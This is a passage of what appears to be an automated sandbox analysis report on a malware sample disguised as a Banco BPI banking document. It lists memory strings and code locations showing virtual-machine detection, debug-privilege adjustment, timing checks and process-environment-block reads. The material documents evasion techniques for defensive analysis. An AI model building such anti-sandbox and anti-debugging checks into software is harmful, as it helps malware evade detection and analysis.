          Source: explorer.exe, 0000000A.00000000.356050398.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 0000000A.00000000.356050398.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 0000000A.00000000.308763766.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
          Source: explorer.exe, 0000000A.00000000.347887377.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.356050398.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000A.00000000.356050398.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: Document de bancobpi_66473474.exe, 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
          Source: explorer.exe, 0000000A.00000000.335965397.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000A.00000000.356050398.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_00408ED0 rdtsc 6_2_00408ED0
          Source: C:\Users\user\Desktop\Document de bancobpi_66473474.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\setup16.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D849B mov eax, dword ptr fs:[00000030h]6_2_049D849B
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A814FB mov eax, dword ptr fs:[00000030h]6_2_04A814FB
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46CF0 mov eax, dword ptr fs:[00000030h]6_2_04A46CF0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46CF0 mov eax, dword ptr fs:[00000030h]6_2_04A46CF0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46CF0 mov eax, dword ptr fs:[00000030h]6_2_04A46CF0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A98CD6 mov eax, dword ptr fs:[00000030h]6_2_04A98CD6
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A9740D mov eax, dword ptr fs:[00000030h]6_2_04A9740D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A9740D mov eax, dword ptr fs:[00000030h]6_2_04A9740D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A9740D mov eax, dword ptr fs:[00000030h]6_2_04A9740D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81C06 mov eax, dword ptr fs:[00000030h]6_2_04A81C06
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46C0A mov eax, dword ptr fs:[00000030h]6_2_04A46C0A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46C0A mov eax, dword ptr fs:[00000030h]6_2_04A46C0A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46C0A mov eax, dword ptr fs:[00000030h]6_2_04A46C0A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46C0A mov eax, dword ptr fs:[00000030h]6_2_04A46C0A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FBC2C mov eax, dword ptr fs:[00000030h]6_2_049FBC2C
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FA44B mov eax, dword ptr fs:[00000030h]6_2_049FA44B
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049E746D mov eax, dword ptr fs:[00000030h]6_2_049E746D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5C450 mov eax, dword ptr fs:[00000030h]6_2_04A5C450
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5C450 mov eax, dword ptr fs:[00000030h]6_2_04A5C450
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FFD9B mov eax, dword ptr fs:[00000030h]6_2_049FFD9B
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FFD9B mov eax, dword ptr fs:[00000030h]6_2_049FFD9B
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A905AC mov eax, dword ptr fs:[00000030h]6_2_04A905AC
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A905AC mov eax, dword ptr fs:[00000030h]6_2_04A905AC
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C2D8A mov eax, dword ptr fs:[00000030h]6_2_049C2D8A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C2D8A mov eax, dword ptr fs:[00000030h]6_2_049C2D8A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C2D8A mov eax, dword ptr fs:[00000030h]6_2_049C2D8A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C2D8A mov eax, dword ptr fs:[00000030h]6_2_049C2D8A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C2D8A mov eax, dword ptr fs:[00000030h]6_2_049C2D8A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F2581 mov eax, dword ptr fs:[00000030h]6_2_049F2581
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F2581 mov eax, dword ptr fs:[00000030h]6_2_049F2581
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F2581 mov eax, dword ptr fs:[00000030h]6_2_049F2581
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F2581 mov eax, dword ptr fs:[00000030h]6_2_049F2581
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F1DB5 mov eax, dword ptr fs:[00000030h]6_2_049F1DB5
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F1DB5 mov eax, dword ptr fs:[00000030h]6_2_049F1DB5
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F1DB5 mov eax, dword ptr fs:[00000030h]6_2_049F1DB5
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F35A1 mov eax, dword ptr fs:[00000030h]6_2_049F35A1
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]6_2_04A8FDE2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]6_2_04A8FDE2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]6_2_04A8FDE2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8FDE2 mov eax, dword ptr fs:[00000030h]6_2_04A8FDE2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A78DF1 mov eax, dword ptr fs:[00000030h]6_2_04A78DF1
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46DC9 mov eax, dword ptr fs:[00000030h]6_2_04A46DC9
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46DC9 mov eax, dword ptr fs:[00000030h]6_2_04A46DC9
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46DC9 mov eax, dword ptr fs:[00000030h]6_2_04A46DC9
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46DC9 mov ecx, dword ptr fs:[00000030h]6_2_04A46DC9
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46DC9 mov eax, dword ptr fs:[00000030h]6_2_04A46DC9
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A46DC9 mov eax, dword ptr fs:[00000030h]6_2_04A46DC9
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DD5E0 mov eax, dword ptr fs:[00000030h]6_2_049DD5E0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DD5E0 mov eax, dword ptr fs:[00000030h]6_2_049DD5E0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8E539 mov eax, dword ptr fs:[00000030h]6_2_04A8E539
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A4A537 mov eax, dword ptr fs:[00000030h]6_2_04A4A537
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A98D34 mov eax, dword ptr fs:[00000030h]6_2_04A98D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F4D3B mov eax, dword ptr fs:[00000030h]6_2_049F4D3B
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F4D3B mov eax, dword ptr fs:[00000030h]6_2_049F4D3B
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F4D3B mov eax, dword ptr fs:[00000030h]6_2_049F4D3B
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D3D34 mov eax, dword ptr fs:[00000030h]6_2_049D3D34
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049CAD30 mov eax, dword ptr fs:[00000030h]6_2_049CAD30
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049E7D50 mov eax, dword ptr fs:[00000030h]6_2_049E7D50
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A03D43 mov eax, dword ptr fs:[00000030h]6_2_04A03D43
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A43540 mov eax, dword ptr fs:[00000030h]6_2_04A43540
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EC577 mov eax, dword ptr fs:[00000030h]6_2_049EC577
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EC577 mov eax, dword ptr fs:[00000030h]6_2_049EC577
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A446A7 mov eax, dword ptr fs:[00000030h]6_2_04A446A7
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A90EA5 mov eax, dword ptr fs:[00000030h]6_2_04A90EA5
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A90EA5 mov eax, dword ptr fs:[00000030h]6_2_04A90EA5
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A90EA5 mov eax, dword ptr fs:[00000030h]6_2_04A90EA5
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5FE87 mov eax, dword ptr fs:[00000030h]6_2_04A5FE87
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F36CC mov eax, dword ptr fs:[00000030h]6_2_049F36CC
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A7FEC0 mov eax, dword ptr fs:[00000030h]6_2_04A7FEC0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A08EC7 mov eax, dword ptr fs:[00000030h]6_2_04A08EC7
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F16E0 mov ecx, dword ptr fs:[00000030h]6_2_049F16E0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A98ED6 mov eax, dword ptr fs:[00000030h]6_2_04A98ED6
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D76E2 mov eax, dword ptr fs:[00000030h]6_2_049D76E2
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FA61C mov eax, dword ptr fs:[00000030h]6_2_049FA61C
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FA61C mov eax, dword ptr fs:[00000030h]6_2_049FA61C
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A7FE3F mov eax, dword ptr fs:[00000030h]6_2_04A7FE3F
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049CC600 mov eax, dword ptr fs:[00000030h]6_2_049CC600
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049CC600 mov eax, dword ptr fs:[00000030h]6_2_049CC600
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049CC600 mov eax, dword ptr fs:[00000030h]6_2_049CC600
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F8E00 mov eax, dword ptr fs:[00000030h]6_2_049F8E00
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A81608 mov eax, dword ptr fs:[00000030h]6_2_04A81608
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049CE620 mov eax, dword ptr fs:[00000030h]6_2_049CE620
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D7E41 mov eax, dword ptr fs:[00000030h]6_2_049D7E41
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D7E41 mov eax, dword ptr fs:[00000030h]6_2_049D7E41
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D7E41 mov eax, dword ptr fs:[00000030h]6_2_049D7E41
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D7E41 mov eax, dword ptr fs:[00000030h]6_2_049D7E41
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D7E41 mov eax, dword ptr fs:[00000030h]6_2_049D7E41
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D7E41 mov eax, dword ptr fs:[00000030h]6_2_049D7E41
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8AE44 mov eax, dword ptr fs:[00000030h]6_2_04A8AE44
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A8AE44 mov eax, dword ptr fs:[00000030h]6_2_04A8AE44
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EAE73 mov eax, dword ptr fs:[00000030h]6_2_049EAE73
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EAE73 mov eax, dword ptr fs:[00000030h]6_2_049EAE73
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EAE73 mov eax, dword ptr fs:[00000030h]6_2_049EAE73
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EAE73 mov eax, dword ptr fs:[00000030h]6_2_049EAE73
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EAE73 mov eax, dword ptr fs:[00000030h]6_2_049EAE73
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D766D mov eax, dword ptr fs:[00000030h]6_2_049D766D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049D8794 mov eax, dword ptr fs:[00000030h]6_2_049D8794
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A47794 mov eax, dword ptr fs:[00000030h]6_2_04A47794
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A47794 mov eax, dword ptr fs:[00000030h]6_2_04A47794
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A47794 mov eax, dword ptr fs:[00000030h]6_2_04A47794
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A037F5 mov eax, dword ptr fs:[00000030h]6_2_04A037F5
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049EF716 mov eax, dword ptr fs:[00000030h]6_2_049EF716
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FA70E mov eax, dword ptr fs:[00000030h]6_2_049FA70E
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FA70E mov eax, dword ptr fs:[00000030h]6_2_049FA70E
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A9070D mov eax, dword ptr fs:[00000030h]6_2_04A9070D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A9070D mov eax, dword ptr fs:[00000030h]6_2_04A9070D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FE730 mov eax, dword ptr fs:[00000030h]6_2_049FE730
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C4F2E mov eax, dword ptr fs:[00000030h]6_2_049C4F2E
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C4F2E mov eax, dword ptr fs:[00000030h]6_2_049C4F2E
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5FF10 mov eax, dword ptr fs:[00000030h]6_2_04A5FF10
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5FF10 mov eax, dword ptr fs:[00000030h]6_2_04A5FF10
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A98F6A mov eax, dword ptr fs:[00000030h]6_2_04A98F6A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DEF40 mov eax, dword ptr fs:[00000030h]6_2_049DEF40
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DFF60 mov eax, dword ptr fs:[00000030h]6_2_049DFF60
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A090AF mov eax, dword ptr fs:[00000030h]6_2_04A090AF
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C9080 mov eax, dword ptr fs:[00000030h]6_2_049C9080
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FF0BF mov ecx, dword ptr fs:[00000030h]6_2_049FF0BF
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FF0BF mov eax, dword ptr fs:[00000030h]6_2_049FF0BF
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049FF0BF mov eax, dword ptr fs:[00000030h]6_2_049FF0BF
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A43884 mov eax, dword ptr fs:[00000030h]6_2_04A43884
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A43884 mov eax, dword ptr fs:[00000030h]6_2_04A43884
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F20A0 mov eax, dword ptr fs:[00000030h]6_2_049F20A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F20A0 mov eax, dword ptr fs:[00000030h]6_2_049F20A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F20A0 mov eax, dword ptr fs:[00000030h]6_2_049F20A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F20A0 mov eax, dword ptr fs:[00000030h]6_2_049F20A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F20A0 mov eax, dword ptr fs:[00000030h]6_2_049F20A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F20A0 mov eax, dword ptr fs:[00000030h]6_2_049F20A0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049C58EC mov eax, dword ptr fs:[00000030h]6_2_049C58EC
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]6_2_04A5B8D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5B8D0 mov ecx, dword ptr fs:[00000030h]6_2_04A5B8D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]6_2_04A5B8D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]6_2_04A5B8D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]6_2_04A5B8D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A5B8D0 mov eax, dword ptr fs:[00000030h]6_2_04A5B8D0
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A47016 mov eax, dword ptr fs:[00000030h]6_2_04A47016
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A47016 mov eax, dword ptr fs:[00000030h]6_2_04A47016
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A47016 mov eax, dword ptr fs:[00000030h]6_2_04A47016
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F002D mov eax, dword ptr fs:[00000030h]6_2_049F002D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F002D mov eax, dword ptr fs:[00000030h]6_2_049F002D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F002D mov eax, dword ptr fs:[00000030h]6_2_049F002D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F002D mov eax, dword ptr fs:[00000030h]6_2_049F002D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049F002D mov eax, dword ptr fs:[00000030h]6_2_049F002D
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DB02A mov eax, dword ptr fs:[00000030h]6_2_049DB02A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DB02A mov eax, dword ptr fs:[00000030h]6_2_049DB02A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DB02A mov eax, dword ptr fs:[00000030h]6_2_049DB02A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049DB02A mov eax, dword ptr fs:[00000030h]6_2_049DB02A
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A94015 mov eax, dword ptr fs:[00000030h]6_2_04A94015
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A94015 mov eax, dword ptr fs:[00000030h]6_2_04A94015
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049E0050 mov eax, dword ptr fs:[00000030h]6_2_049E0050
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_049E0050 mov eax, dword ptr fs:[00000030h]6_2_049E0050
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A82073 mov eax, dword ptr fs:[00000030h]6_2_04A82073
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A91074 mov eax, dword ptr fs:[00000030h]6_2_04A91074
          Source: C:\Windows\SysWOW64\setup16.exeCode function: 6_2_04A469A6 mov eax, dword ptr fs:[00000030h]6_2_04A469A6
